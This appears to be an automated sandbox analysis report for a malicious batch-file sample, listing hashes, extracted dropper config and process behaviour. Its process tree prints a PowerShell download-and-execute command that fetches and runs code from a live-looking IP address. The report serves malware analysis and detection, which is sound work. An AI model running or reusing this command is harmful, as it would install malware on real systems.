Analysis
  max time kernel: 122s
  max time network: 117s
  platform: windows10_x64
  resource: win10
  submitted: 26-07-2020 15:10
Static task: static1
Behavioral task: behavioral1
  Sample: 4eb6ba5ba6c21ac7744e462c7de7df9a.bat
  Resource: win7v200722 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: 4eb6ba5ba6c21ac7744e462c7de7df9a.bat
  Resource: win10 (windows10_x64)
  0 signatures, 0 seconds
General
  Target: 4eb6ba5ba6c21ac7744e462c7de7df9a.bat
  Size: 213B
  MD5: c706ae9c80ccdfa7c936b7c8df7cfa76
  SHA1: 5ec96eaf49a1004e20f9be597ef6c78b7bf69e55
  SHA256: b3a094f34f9fb134e07a2e0b414bcbf01c2097dd4b14f98127ecdeb46343d4cc
  SHA512: 6299207c06345ea343eadff3fb433da135526d9410b863388597cf41c8fb91313a78509c7c69aae221f083a90cc6347a1d31642bbdfc3ac7c8dc5a5188d01ff6
  Score: 10/10
Malware Config
  Extracted
    Language: ps1
    Source: ps1.dropper
    URLs: http://185.103.242.78/pastes/4eb6ba5ba6c21ac7744e462c7de7df9a
Signatures

  Suspicious use of WriteProcessMemory (3 IoCs)
    Description                        PID   Process    Target process
    PID 344 wrote to memory of 3864    344   cmd.exe    powershell.exe
    PID 344 wrote to memory of 3864    344   cmd.exe    powershell.exe
    PID 344 wrote to memory of 3864    344   cmd.exe    powershell.exe

  Program crash (1 IoC)
    PID    Target PID   Process        Target process
    3824   3864         WerFault.exe   powershell.exe

  Suspicious use of AdjustPrivilegeToken (3 IoCs)
    Description                  PID    Process
    Token: SeRestorePrivilege    3824   WerFault.exe
    Token: SeBackupPrivilege     3824   WerFault.exe
    Token: SeDebugPrivilege      3824   WerFault.exe

  Suspicious behavior: EnumeratesProcesses (14 IoCs)
    PID    Process
    3824   WerFault.exe   (14 identical entries)
Processes

  [1] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4eb6ba5ba6c21ac7744e462c7de7df9a.bat"
      PID: 344
      Signatures: Suspicious use of WriteProcessMemory

    [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4eb6ba5ba6c21ac7744e462c7de7df9a');Invoke-BUSJHY;Start-Sleep -s 10000"
        PID: 3864

      [3] C:\Windows\SysWOW64\WerFault.exe
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 700
          PID: 3824
          Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses